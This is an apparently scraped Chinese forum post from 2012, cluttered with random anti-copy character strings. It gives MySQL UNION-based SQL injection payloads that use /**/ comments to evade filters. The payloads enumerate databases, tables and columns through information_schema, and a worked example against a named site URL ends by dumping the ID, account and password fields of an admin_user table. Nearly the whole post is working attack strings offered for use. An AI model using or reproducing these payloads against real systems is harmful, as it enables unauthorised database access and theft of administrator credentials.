查库
: K3 @3 Z! _$ r7 M5 u% G0 Q: n# h, O5 i" r
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
$ R! l& ]9 z& @6 z$ D" ~, l1 v# J1 }: i; g9 }0 r
查表
' I/ q3 Z! z6 i5 H L! R7 r' d( j8 o- n3 G2 X' n
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,15 L! I$ _$ P | D, @# {- M; ~; u0 A
8 a2 M, q% M8 w2 j$ {1 r$ i( Q查段8 B; y- r- r+ S
/ X: ^# V* M6 Z
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
0 P. Y' S0 C2 Z8 P4 _* {9 X. c4 z5 u- l/ |
5 u, U' E& x* r+ j. Smysql5高级注入方法暴表9 f( c& `- m! z5 a' {
% g/ y3 Z8 F. q" d例子如下:
! I7 \& ?' y" i" j, r$ [# ^
. q6 b# W4 j! L6 h# Z1.爆表
' p! A0 Z$ }' Z, j/ fhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)" Y/ y4 o# O& M# n# @" N. c
这样爆到第4个时出现了admin_user表。2 S5 H* O; z- y C
8 U/ \/ x9 h7 U8 m1 C
2.暴字段& L3 j# l# ] [2 V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*% j' H' d0 O& W0 w' ^0 j+ O8 k5 z
8 t) P4 `4 e; m/ ~+ [. b/ t
: G& a* \# @/ i2 {. g- I0 Z7 B3.爆密码
5 W, y" }! r0 I. [$ |+ zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
" N2 w: ?2 I7 ] l
/ R$ e8 j" _3 l
+ ^7 g9 \1 Q( l7 X |
发表于 2012-9-13 16:29:37
收藏
支持
反对